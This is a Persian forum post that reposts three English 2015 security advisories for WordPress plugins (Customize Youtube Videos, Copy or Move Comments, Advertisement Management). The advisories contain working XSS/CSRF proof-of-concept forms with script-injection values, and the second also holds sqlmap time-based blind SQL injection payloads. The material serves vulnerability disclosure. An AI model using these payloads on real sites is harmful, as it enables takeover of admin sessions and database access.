SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

آسیب پذیری XSS در سه پلاگین وردپرس

بستن
X
بستن
 
  • صفحه از 1
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید
قبلی template بعدی
  • #1

    آسیب پذیری XSS در سه پلاگین وردپرس

    [align=right]آسیب پذیری XSS در سه پلاگین وردپرس:

    1- WordPress Customize Youtube Videos 0.2 Cross Site Scripting

    کد:
    Title: WordPress 'Customize Youtube Videos' Plugin 
Version: 0.2
Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej
Date: 2015-06-16
Download: 
- https://wordpress.org/plugins/customize-youtube-videos/
- https://plugins.svn.wordpress.org/customize-youtube-videos/
Notified Vendor/WordPress: 2015-06-21
==========================================================

## Plugin description
==========================================================
This plugin lets you customize the Youtube videos you are going to embed in your posts and pages

## CSRF/XSS vulnerabilities
==========================================================
Customized video settings are displayed unsanitized when pressing "Get the new embed code for your customized Youtube video".

PoC: 
Log in as admin and submit the following form

<form method="POST" action="[URL]/wp-admin/admin.php?page=customize-youtube-videos"> 
 	<input type="text" name="code" value="'></iframe></textarea><script>alert(1)</script>"><br />
 	<input type="text" name="start" value="'></iframe></textarea><script>alert(2)</script>"><br />
 	<input type="text" name="end" value="'></iframe></textarea><script>alert(3)</script>"><br />
 	<input type="text" name="autohide" value="'></iframe></textarea><script>alert(4)</script>"><br />
 	<input type="text" name="autoplay" value="'></iframe></textarea><script>alert(5)</script>"><br />
 	<input type="text" name="cc_load_policy" value="'></iframe></textarea><script>alert(6)</script>"><br />
 	<input type="text" name="controls" value="'></iframe></textarea><script>alert(7)</script>"><br />
 	<input type="text" name="loop" value="'></iframe></textarea><script>alert(8)</script>"><br />
 	<input type="text" name="rel" value="'></iframe></textarea><script>alert(9)</script>"><br />
 	<input type="text" name="showinfo" value="'></iframe></textarea><script>alert(10)</script>"><br />
	<input type="submit">
</form>


## Solution
==========================================================
No fix available

==========================================================
XSS vulnerabilities found using Eir; an early stage static vulnerability scanner for PHP applications.
    [/align]

    2- WordPress Copy Or Move Comments 1.0.0 Cross Site Scripting

    کد:
    Title: WordPress 'Copy or Move Comments' Plugin 
Version: 1.0.0
Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej
Date: 2015-06-16
Download: 
- https://wordpress.org/plugins/copy-or-move-comments/
- https://plugins.svn.wordpress.org/copy-or-move-comments/
Notified WordPress: 2015-06-21
==========================================================

## Plugin description
==========================================================
Using Copy/Move WordPress Plugin the admin can copy or move any comment from several types of pages to any other page!

## Vulnerabilities
==========================================================
Two POST parameters are printed unsanitized on the plugins admin page.

PoC:
Log in as admin and submit the following form:
<form method="POST" action="[URL]/wp-admin/admin-ajax.php"> 
 	<input type="text" name="action" value="get_all_posts" readonly><br />
 	<input type="text" name="post_type" value="'</script><script> alert(1)</script>"><br />
 	<input type="text" name="action_type" value="'</script><script> alert(2)</script>"><br />
	<input type="submit">
</form>

Some of the SQL queries are exploitable from the admin page.

SQLMAP log snippet:
POST parameter 'source_post' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
...
POST parameter 'target_post' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection points with a total of 174 HTTP(s) requests:
---
Parameter: source_post (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: option_page=copy-move-settings-group&action=update&_wpnonce=5fd9b35c58&_wp_http_referer=/projects
/wp422/wp-admin//admin.php?page=copy-move%26error=1&copy-move=move&all_post_types=post&source_post=1 AND (SELE
CT * FROM (SELECT(SLEEP(5)))HzuL)&move_comment_id[]=1&target_post=10&action=action_move

Parameter: target_post (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: option_page=copy-move-settings-group&action=update&_wpnonce=5fd9b35c58&_wp_http_referer=/projects
/wp422/wp-admin//admin.php?page=copy-move%26error=1&copy-move=move&all_post_types=post&source_post=1&move_comm
ent_id[]=1&target_post=10 AND (SELECT * FROM (SELECT(SLEEP(5)))kBfe)&action=action_move
---



## Solution
==========================================================
No fix available

==========================================================
Vulnerabilities found using Eir; an early stage static vulnerability scanner for PHP applications.
    3- WordPress Advertisement Management 1.0 Cross Site Scripting

    کد:
    Title: WordPress 'Advertisement Management' Plugin 
Version: 1.0
Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej
Date: 2015-06-16
Download: 
- https://wordpress.org/plugins/advertisement-management/
- https://plugins.svn.wordpress.org/advertisement-management/
Notified WordPress: 2015-06-21
==========================================================

## Plugin description
==========================================================
Advertisement Management lets you administrate all the blog advertisements diretctly from the blog backend.

## XSS/CSRF vulnerabilities
==========================================================
The settings on the admin page is vulnerable to XSS.

PoC:
Log in as admin and submit the this form

<form method="POST" action="[URL]/wp-admin/options-general.php?page=Advertising_page&action=update"> 
 	<input type="text" name="Advertising_front_page" value="</textarea><script>alert(1)</script>"><br />
 	<input type="text" name="Advertising_single_top" value="</textarea><script>alert(2)</script>"><br />
 	<input type="text" name="Advertising_single_bottom" value="</textarea><script>alert(3)</script>"><br />
 	<input type="text" name="Advertising_page_top" value="</textarea><script>alert(4)</script>"><br />
 	<input type="text" name="Advertising_page_bottom" value="</textarea><script>alert(5)</script>"><br />
 	<input type="text" name="Advertising_below_commentbox" value="</textarea><script>alert(6)</script>"><br />
 	<input type="text" name="Advertising_blog_top" value="</textarea><script>alert(7)</script>"><br />
 	<input type="text" name="Advertising_below_footer" value="</textarea><script>alert(8)</script>"><br />
	<input type="submit">
</form>

After having done this, some of the injected scripts will be executed when loading the front page of the site.

## Solution
==========================================================
No fix available

==========================================================
XSS vulnerabilities found using Eir; an early stage static vulnerability scanner for PHP applications.
    [align=center]

    [/align]
    برچسب ها: هیچ یک
قبلی template بعدی
صبر کنید ..
X